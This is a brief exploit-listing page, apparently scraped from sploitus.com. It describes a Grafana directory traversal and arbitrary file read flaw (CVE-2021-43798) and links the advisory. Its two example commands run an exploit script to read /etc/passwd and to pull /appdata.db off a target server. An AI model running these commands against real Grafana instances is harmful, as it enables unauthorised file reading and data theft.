Share
## https://sploitus.com/exploit?id=FE3C17CE-4B3B-5955-92AF-F2A330AFAFA6
# CVE-2021-43798
> Grafana - Directory Traversal and Arbitrary File Read

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43798
- https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/

## Example
```bash
python3 exploit.py http://127.0.0.1:3000 /etc/passwd
```
```bash
python3 exploit.py http://127.0.0.1:3000 /appdata.db --output appdata.db 
```